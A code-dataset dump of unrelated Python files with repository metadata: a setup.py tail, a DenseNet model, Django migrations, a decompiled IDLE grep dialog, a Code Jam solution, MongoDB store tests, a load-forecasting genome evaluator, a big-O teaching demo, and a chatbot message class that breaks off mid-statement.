        # '-DCMAKE_BUILD_TYPE=Debug'
    ],
    name='hdlConvertor',
    version='2.2',
    description='VHDL and System Verilog parser written in c++',
    long_description=long_description,
    long_description_content_type="text/markdown",
    url='https://github.com/Nic30/hdlConvertor',
    author='Michal Orsak',
    author_email='[email protected]',
    keywords=['hdl', 'vhdl', 'verilog', 'system verilog',
              'parser', 'preprocessor', 'antlr4'],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'Operating System :: OS Independent',
        'Topic :: Software Development :: Build Tools',
        'Programming Language :: C++',
        'Programming Language :: Cython',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',
    ],
    install_requires=[
        'hdlConvertorAst>=0.7',
    ] + deps,
    license="MIT",
    packages=find_packages(exclude=["tests", ]),
    test_suite="tests.main_test_suite",
    test_runner="tests:TimeLoggingTestRunner",
    tests_require=deps,
)
8bfa5c02a3089abb03156a6609bfed1a989474e9
d5f8ca3c13f681d147b7614f1902df7ba34e06f9
/Graduate/model/densenet.py
38359413ab29892a7c8f412c5fc1741039a65696
[]
no_license
hhjung1202/OwnAdaptation
29a6c0a603ab9233baf293096fb9e7e956647a10
50805730254419f090f4854387be79648a01fbb4
refs/heads/master
2021-06-25T22:31:15.437642
2020-11-26T18:19:55
2020-11-26T18:19:55
176,670,379
1
0
null
2020-06-11T07:35:55
2019-03-20T06:36:19
Python
UTF-8
Python
false
false
7,429
py
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torch import Tensor
import itertools


class Flatten(nn.Module):
    def forward(self, x):
        return x.view(x.size(0), -1)


class _Gate_selection(nn.Sequential):
    phase = 2

    def __init__(self, num_input_features, growth_rate, count, reduction=4):
        super(_Gate_selection, self).__init__()

        self.actual = (count + 1) // 2
        LongTensor = torch.cuda.LongTensor if torch.cuda.is_available() else torch.LongTensor
        self.init = LongTensor([i for i in range(num_input_features)]).view(1, -1)
        s = num_input_features
        arr = []
        for j in range(count):
            arr += [[i for i in range(s, s + growth_rate)]]
            s += growth_rate
        self.arr = LongTensor(arr)

        self.avg_pool = nn.AdaptiveAvgPool2d(1)
        channels = num_input_features + growth_rate * count
        self.fc1 = nn.Linear(channels, channels // reduction)
        self.relu = nn.ReLU(inplace=True)
        self.fc2 = nn.Linear(channels // reduction, count)
        self.sigmoid = nn.Sigmoid()
        self.flat = Flatten()

    def forward(self, x, x_norm):
        b, _, w, h = x_norm.size()
        out = self.avg_pool(x_norm)  # batch, concatenated channels, w, h
        out = self.flat(out)
        out = self.relu(self.fc1(out))
        out = self.sigmoid(self.fc2(out))
        _, sort = out.sort()
        indices = sort[:, :self.actual]  # batch, sort
        # shuffle
        indices = indices[:, torch.randperm(indices.size(1))]
        select = self.init.repeat(b, 1)
        select = torch.cat([select, self.arr[indices].view(b, -1)], 1)
        select = select.view(select.size(0), -1, 1, 1).repeat(1, 1, w, h)
        x = x.gather(1, select)
        return x


class _Bottleneck(nn.Sequential):
    def __init__(self, num_input_features, growth_rate, count=1):
        super(_Bottleneck, self).__init__()
        self.norm1 = nn.BatchNorm2d(num_input_features)
        self.relu = nn.ReLU(inplace=True)
        self.conv1 = nn.Conv2d(num_input_features, 4 * growth_rate,
                               kernel_size=1, stride=1, bias=False)
        self.norm2 = nn.BatchNorm2d(4 * growth_rate)
        self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate,
                               kernel_size=3, stride=1, padding=1, bias=False)
        self.count = count

    def forward(self, x):
        if isinstance(x, Tensor):
            x = [x]
        out = torch.cat(x, 1)
        out = self.norm1(out)
        out = self.relu(out)
        out = self.conv1(out)
        out = self.norm2(out)
        out = self.relu(out)
        out = self.conv2(out)
        return out


class _Basic(nn.Sequential):
    def __init__(self, num_input_features, growth_rate, count=1):
        super(_Basic, self).__init__()
        self.norm1 = nn.BatchNorm2d(num_input_features)
        self.relu = nn.ReLU(inplace=True)
        self.conv1 = nn.Conv2d(num_input_features, growth_rate,
                               kernel_size=3, stride=1, padding=1, bias=False)
        self.count = count

    def forward(self, x):
        if isinstance(x, Tensor):
            x = [x]
        out = torch.cat(x, 1)
        out = self.norm1(out)
        out = self.relu(out)
        out = self.conv1(out)
        return out


class _DenseLayer(nn.Module):
    def __init__(self, num_input_features, growth_rate, num_layers, Block):
        super(_DenseLayer, self).__init__()
        self.num_layers = num_layers
        self.init_block = Block(num_input_features, growth_rate)
        for i in range(1, num_layers):
            j = (i - 1) // 2 + 1
            setattr(self, 'layer{}'.format(i),
                    Block(num_input_features + growth_rate * j, growth_rate))
            setattr(self, 'norm{}'.format(i),
                    nn.BatchNorm2d(num_input_features + growth_rate * (i + 1)))
            setattr(self, 'gate{}'.format(i),
                    _Gate_selection(num_input_features, growth_rate, i + 1, reduction=4))

    def forward(self, x):
        out = self.init_block(x)
        x = [x] + [out]
        out = torch.cat(x, 1)
        for i in range(1, self.num_layers):
            out = getattr(self, 'layer{}'.format(i))(out)
            x += [out]
            x_cat = torch.cat(x, 1)
            x_norm = getattr(self, 'norm{}'.format(i))(x_cat)
            out = getattr(self, 'gate{}'.format(i))(x_cat, x_norm)
        return x_cat


class _Transition(nn.Sequential):
    def __init__(self, num_input_features, tr_features):
        super(_Transition, self).__init__()
        self.norm = nn.BatchNorm2d(tr_features)
        self.relu = nn.ReLU(inplace=True)
        self.conv = nn.Conv2d(tr_features, num_input_features // 2,
                              kernel_size=1, stride=1, bias=False)
        self.pool = nn.AvgPool2d(kernel_size=2, stride=2)

    def forward(self, x):
        # out = torch.cat(x,1)
        out = self.norm(x)
        out = self.relu(out)
        out = self.conv(out)
        out = self.pool(out)
        return out


class DenseNet(nn.Module):
    def __init__(self, growth_rate=12, num_init_features=24, num_classes=10,
                 is_bottleneck=True, layer=28):
        super(DenseNet, self).__init__()

        if layer == 28:
            block_config = [4, 4, 4]
        elif layer == 40:
            block_config = [6, 6, 6]
        elif layer == 52:
            block_config = [8, 8, 8]
        elif layer == 64:
            block_config = [10, 10, 10]

        if is_bottleneck:
            Block = _Bottleneck
        else:
            Block = _Basic
            block_config = [2 * x for x in block_config]

        self.features = nn.Sequential()
        self.features.add_module('conv0', nn.Conv2d(3, num_init_features,
                                                    kernel_size=3, stride=1,
                                                    padding=1, bias=False))

        num_features = num_init_features
        for i in range(len(block_config)):
            self.features.add_module('layer%d' % (i + 1),
                                     _DenseLayer(num_features, growth_rate,
                                                 block_config[i], Block))
            tr_features = num_features + block_config[i] * growth_rate
            num_features = num_features + block_config[i] * growth_rate // 2
            if i != len(block_config) - 1:
                self.features.add_module('transition%d' % (i + 1),
                                         _Transition(num_features, tr_features))
                num_features = num_features // 2

        # Final batch norm
        self.norm = nn.BatchNorm2d(tr_features)
        self.relu = nn.ReLU(inplace=True)
        self.pool = nn.AvgPool2d(kernel_size=8, stride=1)
        # Linear layer
        self.fc = nn.Linear(tr_features, num_classes)

        # Official init from torch repo.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.Linear):
                nn.init.constant_(m.bias, 0)

    def forward(self, x):
        out = self.features(x)
        # out = torch.cat(out,1)
        out = self.norm(out)
        out = self.relu(out)
        out = self.pool(out)
        out = out.view(out.size(0), -1)
        out = self.fc(out)
        return out


if __name__ == '__main__':
    x = torch.randn(4, 3, 32, 32)
    model = DenseNet(growth_rate=12, num_init_features=24, num_classes=10,
                     is_bottleneck=True, layer=40)
    y = model(x)
    print(y.size())
da39ff189fd2c0d2ba922949117085f9ce98e2fa
85be450530138c8b66c513c4283bcb1d58caeeb0
/apps/funcionarios/migrations/0005_funcionario_imagem.py
bc149c39e59bf25051a7e604642ca132a0e9a4c1
[]
no_license
fgomesc/gestao_teste
6be81a263fddb1b1e5d6a2d768387fc024e9bdc3
b2890ffa99361dd30b002706c94d1e5299651315
refs/heads/master
2021-09-25T06:21:51.602878
2021-09-14T18:27:13
2021-09-14T18:27:13
236,030,673
0
0
null
2021-06-10T22:31:09
2020-01-24T15:42:59
JavaScript
UTF-8
Python
false
false
446
py
# Generated by Django 2.1.1 on 2018-11-17 12:21

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('funcionarios', '0004_auto_20181029_2313'),
    ]

    operations = [
        migrations.AddField(
            model_name='funcionario',
            name='imagem',
            field=models.ImageField(default=1, upload_to='fotos'),
            preserve_default=False,
        ),
    ]
041cf40053b8f029ba5b1f64754d2048cbb70f5e
2af6a5c2d33e2046a1d25ae9dd66d349d3833940
/res_bw/scripts/common/lib/idlelib/grepdialog.py
05f4b74a7d37f75455c785428aa681b07d431a4b
[]
no_license
webiumsk/WOT-0.9.12-CT
e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2
2506e34bd6634ad500b6501f4ed4f04af3f43fa0
refs/heads/master
2021-01-10T01:38:38.080814
2015-11-11T00:08:04
2015-11-11T00:08:04
45,803,240
0
0
null
null
null
null
WINDOWS-1250
Python
false
false
4,154
py
# 2015.11.10 21:36:11 Central Europe (standard time)
# Embedded file name: scripts/common/Lib/idlelib/GrepDialog.py
import os
import fnmatch
import sys
from Tkinter import *
from idlelib import SearchEngine
from idlelib.SearchDialogBase import SearchDialogBase

def grep(text, io = None, flist = None):
    root = text._root()
    engine = SearchEngine.get(root)
    if not hasattr(engine, '_grepdialog'):
        engine._grepdialog = GrepDialog(root, engine, flist)
    dialog = engine._grepdialog
    searchphrase = text.get('sel.first', 'sel.last')
    dialog.open(text, searchphrase, io)


class GrepDialog(SearchDialogBase):
    title = 'Find in Files Dialog'
    icon = 'Grep'
    needwrapbutton = 0

    def __init__(self, root, engine, flist):
        SearchDialogBase.__init__(self, root, engine)
        self.flist = flist
        self.globvar = StringVar(root)
        self.recvar = BooleanVar(root)

    def open(self, text, searchphrase, io = None):
        SearchDialogBase.open(self, text, searchphrase)
        if io:
            path = io.filename or ''
        else:
            path = ''
        dir, base = os.path.split(path)
        head, tail = os.path.splitext(base)
        if not tail:
            tail = '.py'
        self.globvar.set(os.path.join(dir, '*' + tail))

    def create_entries(self):
        SearchDialogBase.create_entries(self)
        self.globent = self.make_entry('In files:', self.globvar)

    def create_other_buttons(self):
        f = self.make_frame()
        btn = Checkbutton(f, anchor='w', variable=self.recvar, text='Recurse down subdirectories')
        btn.pack(side='top', fill='both')
        btn.select()

    def create_command_buttons(self):
        SearchDialogBase.create_command_buttons(self)
        self.make_button('Search Files', self.default_command, 1)

    def default_command(self, event = None):
        prog = self.engine.getprog()
        if not prog:
            return
        path = self.globvar.get()
        if not path:
            self.top.bell()
            return
        from idlelib.OutputWindow import OutputWindow
        save = sys.stdout
        try:
            sys.stdout = OutputWindow(self.flist)
            self.grep_it(prog, path)
        finally:
            sys.stdout = save

    def grep_it(self, prog, path):
        dir, base = os.path.split(path)
        list = self.findfiles(dir, base, self.recvar.get())
        list.sort()
        self.close()
        pat = self.engine.getpat()
        print 'Searching %r in %s ...' % (pat, path)
        hits = 0
        for fn in list:
            try:
                with open(fn) as f:
                    for lineno, line in enumerate(f, 1):
                        if line[-1:] == '\n':
                            line = line[:-1]
                        if prog.search(line):
                            sys.stdout.write('%s: %s: %s\n' % (fn, lineno, line))
                            hits += 1
            except IOError as msg:
                print msg

        print 'Hits found: %s\n(Hint: right-click to open locations.)' % hits if hits else 'No hits.'

    def findfiles(self, dir, base, rec):
        try:
            names = os.listdir(dir or os.curdir)
        except os.error as msg:
            print msg
            return []

        list = []
        subdirs = []
        for name in names:
            fn = os.path.join(dir, name)
            if os.path.isdir(fn):
                subdirs.append(fn)
            elif fnmatch.fnmatch(name, base):
                list.append(fn)

        if rec:
            for subdir in subdirs:
                list.extend(self.findfiles(subdir, base, rec))

        return list

    def close(self, event = None):
        if self.top:
            self.top.grab_release()
            self.top.withdraw()


if __name__ == '__main__':
    import unittest
    unittest.main('idlelib.idle_test.test_grep', verbosity=2, exit=False)
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\idlelib\grepdialog.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:36:11 Central Europe (standard time)
8479fc36a34cd92829460ba09dac9233003f21e2
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_145/588.py
bc85913e20b14805e33519ef4c6568305d07637f
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,649
py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function

import math

def read(f):
    n = int(f.readline().strip())
    for i in xrange(n):
        p, q = map(int, f.readline().strip().split('/'))
        yield p, q

def main(f):
    for i, (p, q) in enumerate(read(f)):
        if 2 ** int(math.log(q) / math.log(2)) != q:
            print("Case #{0}: impossible".format(i + 1))
        else:
            n = int(math.ceil((math.log(q) - math.log(p)) / math.log(2)))
            print("Case #{0}: {1}".format(i + 1, n))

_input = """
5
1/2
3/4
1/4
2/23
123/31488
""".strip()

_output = """
Case #1: 1
Case #2: 1
Case #3: 2
Case #4: impossible
Case #5: 8
""".strip()

def test_main(compare=False):
    import sys
    from difflib import unified_diff
    from StringIO import StringIO
    if compare:
        stdout = sys.stdout
        sys.stdout = StringIO()
        try:
            main(StringIO(_input))
            result = sys.stdout.getvalue().strip()
        finally:
            sys.stdout = stdout
        print(result)
        for line in unified_diff(result.splitlines(), _output.splitlines(),
                                 'Output', 'Expect', lineterm=''):
            print(line)
        if result == _output:
            print("OK")
        else:
            print("NG")
    else:
        main(StringIO(_input))

if __name__ == '__main__':
    test = False
    compare = False
    if test:
        test_main(compare)
    else:
        import sys
        if len(sys.argv) > 1:
            f = open(sys.argv[1])
            main(f)
            f.close()
        else:
            main(sys.stdin)
729aafbd622a90e8bebf023ef2424d3fcf61b70c
afea9757be324c8def68955a12be11d71ce6ad35
/willyanealves/services/migrations/0014_auto_20201209_1623.py
aa5563d97e9d3dbc154b4da10bedc96ae1265e5e
[]
no_license
bergpb/willyane-alves
c713cac3ec3a68005f3b8145985693d2477ba706
8b2b9922ba35bf2043f2345228f03d80dbd01098
refs/heads/master
2023-02-10T19:57:50.893172
2021-01-11T16:17:14
2021-01-11T16:17:14
null
0
0
null
null
null
null
UTF-8
Python
false
false
551
py
# Generated by Django 3.1.2 on 2020-12-09 19:23

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('stock', '0001_initial'),
        ('services', '0013_remove_kititem_price'),
    ]

    operations = [
        migrations.AlterField(
            model_name='kititem',
            name='item',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stockitem', to='stock.stock'),
        ),
    ]
c91563eee6c60960746a34671256bdc380a91e08
af3ec207381de315f4cb6dddba727d16d42d6c57
/dialogue-engine/test/programytest/storage/stores/nosql/mongo/store/test_sets.py
b4a1ce00829727f91194650b0127c7d2bb059299
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
mcf-yuichi/cotoba-agent-oss
02a5554fe81ce21517f33229101013b6487f5404
ce60833915f484c4cbdc54b4b8222d64be4b6c0d
refs/heads/master
2023-01-12T20:07:34.364188
2020-11-11T00:55:16
2020-11-11T00:55:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,711
py
""" Copyright (c) 2020 COTOBA DESIGN, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest from programytest.storage.asserts.store.assert_sets import SetStoreAsserts from programy.storage.stores.nosql.mongo.store.sets import MongoSetsStore from programy.storage.stores.nosql.mongo.engine import MongoStorageEngine from programy.storage.stores.nosql.mongo.config import MongoStorageConfiguration import programytest.storage.engines as Engines class MongoSetsStoreTests(SetStoreAsserts): @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_initialise(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assertEqual(store.storage_engine, engine) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_set_storage(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_set_storage(store) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_upload_from_text(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_from_text(store) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_upload_from_text_file(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_from_text_file(store) @unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled) def test_upload_text_files_from_directory_no_subdir(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_text_files_from_directory_no_subdir(store) @unittest.skip("CSV not supported yet") def test_upload_from_csv_file(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_from_csv_file(store) @unittest.skip("CSV not supported yet") def test_upload_csv_files_from_directory_with_subdir(self): config = MongoStorageConfiguration() engine = MongoStorageEngine(config) engine.initialise() store = MongoSetsStore(engine) self.assert_upload_csv_files_from_directory_with_subdir(store)
dcd0da39888cc54780f3269f3b421d663fbe0369
12d0f444452d3b2218cd270756283a0463d3e796
/sg/models/genome_evaluator.py
ebfcee9c68636525d62cd1370f29350bfbce32e0
[]
no_license
dal3006/load_forecasting-1
107ffdbb4648989ba85fa8ba39ecdddb9c24ddd1
d324a711a1a0c7ccd9587e0ecf9988a12214a1a3
refs/heads/master
2023-03-17T07:44:43.487863
2015-03-12T15:24:37
2015-03-12T15:24:37
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,873
py
"""Use this program to evaluate one genome at a time, read from standard input.""" import sys import ast import traceback import random import matplotlib.pyplot as plt import sg.utils.pyevolve_utils as pu import sg.utils import ga import sg.data.sintef.userloads as ul import load_prediction as lp from load_prediction_ar import * from load_prediction_ar24 import * from load_prediction_arima import * from load_prediction_dshw import * from load_prediction_esn import * from load_prediction_esn24 import * try: from load_prediction_CBR import * from load_prediction_wavelet import * from load_prediction_wavelet24 import * except ImportError: print >>sys.stderr, "Genome evaluator can't import CBR/wavelet modules, probably some of the dependencies are not installed." options = None def get_options(): global options parser = lp.prediction_options() parser = lp.ga_options(parser) parser = lp.data_options(parser) parser.add_option("--model", dest="model", help="The model class that the genomes instantiate", default=None) parser.add_option("--test-set", dest="test_set", action="store_true", help="Test the genomes on the test set, rather than on the training set", default=False) parser.add_option("--plot", dest="plot", action="store_true", help="Make a plot (in combination with --test-set)", default=False) (options, args) = parser.parse_args() lp.options = options if options.model is None: print >>sys.stderr, "Model argument is required." sys.exit(1) def read_next_genome_list(): print "Enter genome to be evaluated: " line = sys.stdin.readline() if line == "": print "End of input, exiting." sys.exit(0) return ast.literal_eval(line) def next_indiv(): gl = read_next_genome_list() genome = pu.AllelesGenome() genome.setInternalList(gl) genome.setParams(num_trials=options.num_trials) return genome def gene_test_loop(model): while sys.stdin: ga._model = model indiv = next_indiv() if options.test_set: print "Evaluating genome on test set: ", indiv[:] sys.stdout.flush() try: (target, predictions) = lp.parallel_test_genome(indiv, model) if options.parallel else lp.test_genome(indiv, model) except Exception, e: print >>sys.stderr, "Exception raised, failed to evaluate genome." tb = " " + traceback.format_exc(limit=50)[:-1] print >>sys.stderr, tb.replace("\n", "\n ") continue error = sg.utils.concat_and_calc_error(predictions, target, model.error_func) print "Error on test phase: {}".format(error) if options.plot: sg.utils.plot_target_predictions(target, predictions) plt.show() else: print "Evaluating genome on training set: ", indiv[:] sys.stdout.flush() fitness = ga._fitness(indiv) print "Fitness:", fitness if fitness != 0: print "Error:", ga._fitness_to_error(fitness) else: print "Error not calculated for 0 fitness." def run(): """.""" get_options() prev_handler = np.seterrcall(lp.float_err_handler) prev_err = np.seterr(all='call') np.seterr(under='ignore') random.seed(options.seed) np.random.seed(options.seed) model_creator = eval(options.model + "(options)") model = model_creator.get_model() lp._print_sim_context(model._dataset) print "Number of training sequences: %d" % options.num_trials print "Start days of training sequences:", model._dataset.train_periods_desc gene_test_loop(model) ul.tempfeeder_exp().close() if __name__ == "__main__": run()
7f370a2f39867e89d89ab28e23fdbd1bf78c5c33
affb8d9028f52201dc56dff947502134dcac3066
/class-06/demo/big_O.py
a4cb31e5067e800c86925b9dfb3be4fe661ec627
[]
no_license
maisjamil1/amman-python-401d1
10aa4d81c9082fbdf18badc3de060ce1d5309e1a
25c37a5a7c023b5a24ba7a6cc303338b62548f83
refs/heads/master
2022-12-28T19:23:11.143932
2020-10-13T11:58:30
2020-10-13T11:58:30
287,927,879
0
0
null
2020-08-16T11:11:27
2020-08-16T11:11:27
null
UTF-8
Python
false
false
2,410
py
# Measure # of operations
n = 7  # 1 operation

for i in range(n):
    print(i)  # n operations
# n+1 operations
# n = 5 > 6
# n = 100 > 101
# n = 1000000 > 1000001
# O(n+1)
# O(n)

def testing_bigoh(n):
    for i in range(n):
        for j in range(n):
            print(i, j)  # n*n (n^2) operations

# testing_bigoh(8)
# O(n^2)

nums1 = [2, 5, 8, 9, 43, 7]
nums2 = [-4, 43, 7, 8, 13, 45]

# One Loop
# Return a list of all items bigger than number in unsorted list
def find_nums_above(nums_list, number):
    result = []  # 1 operation
    for num in nums_list:  # n times
        if num > number:
            result.append(num)  # 1 operation -- 1 extra space
        elif num < number:
            print("Less")
        else:
            print("Else")
        print("Done with current iteration")  # 1 operation
    return result  # 1 operation

print(find_nums_above(nums1, 10))
# O(2*n+1+1) => O(2n+2)
# O(n)
# O(n) spaces

def find_nums_above_loop_inside(nums_list, number):
    result = []  # 1 operation
    for num in nums_list:  # n times
        if num > number:
            result.append(num)  # 1 operation
        elif num < number:
            print("Less")  # 1 op
            for j in range(len(nums_list)):  # n times
                print("Just for fun")  # 1 op
        else:
            print("Else")  # 1 op
        print("Done with current iteration")  # 1 operation
    return result  # 1 operation

# O(1 + n (1+ (1 or 1+n or 1) ) + 1)
# O(1 + n (1+ 1+n) + 1)
# O(1 + n(2+n) +1)
# O(2 + 2n^2)
# O(2n^2)
# O(n^2)
print(find_nums_above_loop_inside(nums1, 10))

def tricky_example(a):
    print("Hi")  # 1 op
    print(3*4*6/2)  # 1 op
    a.sort()  # Hidden loop (n*log(n)) -- Merge sort
    print(a)  # 1 op
    print("The end")  # 1 op

# O(4 + sort-big-oh)
# O(sort-big-oh)
a = [4, 7, 2, 9, 5, 0, 3]

# Binary Search
# O(log n)
# We divide the array into two halves and we eliminate one of them
sorted_list = [-1, 4, 6, 9, 23, 30, 45, 65, 76, 77, 90]

def binary_search(sorted_nums, target):
    min = 0  # 1 space
    max = len(sorted_nums) - 1  # 1 space
    while max > min:
        pivot = (max + min) // 2  # 1 space
        print(max, min, pivot)
        if target == sorted_nums[pivot]:
            return pivot
        elif target < sorted_nums[pivot]:
            max = pivot - 1
        else:
            min = pivot + 1
    return -1

print(binary_search(sorted_list, -1))
# O(3) spaces
# O(1)
# O(3*log n ) spaces
# O(log n)

def fib(i):
    # base cases
    return fib(i-1) + fib(i-2)

# fib(4) = fib(3) + fib(2)
# We recreate i variable in every recursive call
0ff0703817449a164cc4148e5e772d7aad82761d
20a0bd0a9675f52d4cbd100ee52f0f639fb552ef
/transit_odp/data_quality/migrations/0010_auto_20191118_1604.py
1dbd2499c70b6991917a996f3979d7d53de8b877
[]
no_license
yx20och/bods
2f7d70057ee9f21565df106ef28dc2c4687dfdc9
4e147829500a85dd1822e94a375f24e304f67a98
refs/heads/main
2023-08-02T21:23:06.066134
2021-10-06T16:49:43
2021-10-06T16:49:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,602
py
# Generated by Django 2.2.7 on 2019-11-18 16:04

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ("data_quality", "0009_auto_20191118_1029"),
    ]

    operations = [
        migrations.RemoveField(
            model_name="service",
            name="report",
        ),
        migrations.AddField(
            model_name="service",
            name="ito_id",
            field=models.TextField(default=None, unique=True),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="service",
            name="reports",
            field=models.ManyToManyField(
                related_name="services", to="data_quality.DataQualityReport"
            ),
        ),
        migrations.AddField(
            model_name="servicelink",
            name="ito_id",
            field=models.TextField(default=None, unique=True),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="servicepattern",
            name="ito_id",
            field=models.TextField(default=None, unique=True),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="timingpattern",
            name="ito_id",
            field=models.TextField(default=None, unique=True),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="vehiclejourney",
            name="ito_id",
            field=models.TextField(default=None, unique=True),
            preserve_default=False,
        ),
    ]
fce283892ba59dcf2ba42e224830b42612d88aa5
ec3e9925af8742d578fd11aac6f000ced71aa9f5
/crm_app/migrations/0001_initial.py
a8d2064e20aeff0443aad84487887d739acbfa32
[]
no_license
amrit-kumar/CRM-Customer-relationship-management-
cfd3ec42a975e7b987d76abe465cb2ec9eec62b4
d41b482166557e17825b2a010d24bb03ee469245
refs/heads/master
2021-06-25T06:37:51.721771
2017-08-12T09:43:23
2017-08-12T09:43:23
96,964,635
0
0
null
null
null
null
UTF-8
Python
false
false
1,216
py
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2017-01-17 10:59
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='MsgReports',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('request_id', models.CharField(blank=True, max_length=250, null=True)),
                ('user_id', models.CharField(blank=True, max_length=250, null=True)),
                ('date', models.DateTimeField(blank=True, null=True)),
                ('discription', models.CharField(blank=True, max_length=250, null=True)),
                ('number', models.BigIntegerField(blank=True, null=True)),
                ('sender_id', models.CharField(blank=True, max_length=250, null=True)),
                ('campaign_name', models.CharField(blank=True, max_length=250, null=True)),
                ('status', models.CharField(blank=True, choices=[('1', '1'), ('2', '2'), ('3', '3')], max_length=250, null=True)),
            ],
        ),
    ]
22cd4aa937ae8cfd23745a3259f156cd50b64a4e
cb3583cc1322d38b1ee05cb1c081e0867ddb2220
/donor/migrations/0014_auto_20210331_0404.py
b1189bdce3ff86f5f1436a2a55ec393aa74d80f9
[ "MIT" ]
permissive
iamgaddiel/codeupblood
9e897ff23dedf5299cb59fd6c44d9bd8a645e9c6
a0aa1725e5776d80e083b6d4e9e67476bb97e983
refs/heads/main
2023-05-07T23:34:27.475043
2021-04-24T20:49:08
2021-04-24T20:49:08
null
0
0
null
null
null
null
UTF-8
Python
false
false
405
py
# Generated by Django 3.1.6 on 2021-03-31 11:04

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('donor', '0013_auto_20210330_0743'),
    ]

    operations = [
        migrations.AlterField(
            model_name='appointment',
            name='d_id',
            field=models.CharField(default='oiapGX', max_length=50),
        ),
    ]
d1a50b99473a4235042bb673ae4d5648722d7914
720dcd12b8fb7ab26125317a6f3d00c2623e5f13
/chatbotQuery/__init__.py
fe8fcde48e539b7f3222f7e172a5b2d88236c54b
[ "MIT" ]
permissive
tgquintela/chatbot_query
78e6f21268e06572009295c271c277ef89f2dcbc
4c5160992a444f828da019ae57a802467a13c2fa
refs/heads/master
2021-01-01T18:00:46.261089
2017-10-13T18:03:32
2017-10-13T18:03:32
98,224,976
0
1
null
null
null
null
UTF-8
Python
false
false
6,896
py
""" TODO ---- Decorator for message collections """ import copy class ChatbotMessage(dict): """ Compulsary elements ------------------- - message - collection - from [user, bot] """ def __init__(self, message): self.update({'message': '', 'collection': False}) self.update(message) assert('from' in self) assert('message' in self) assert('collection' in self) @classmethod def from_message(cls, message): if isinstance(message, ChatbotMessage): return message return cls(message) @classmethod def from_candidates_messages(cls, message): message.update({'from': 'bot'}) if type(message['message']) == str: message['collection'] = False elif type(message['message']) == list: message['collection'] = True return cls(message) @classmethod def fake_user_message(cls): return cls({'from': 'user'}) @property def last_message_text(self): if self['collection']: return self['message'][-1]['message'] else: return self['message'] def get_last_post(self): _, last_post = self._filter_message_2_post() for p in last_post: yield p def get_post(self): posts, _ = self._filter_message_2_post() for p in posts: yield p def get_all_messages(self): for p in self.get_post(): yield p for p in self.get_last_post(): yield p def format_message(self, format_information): if self['collection']: self['message'][-1]['message'] =\ 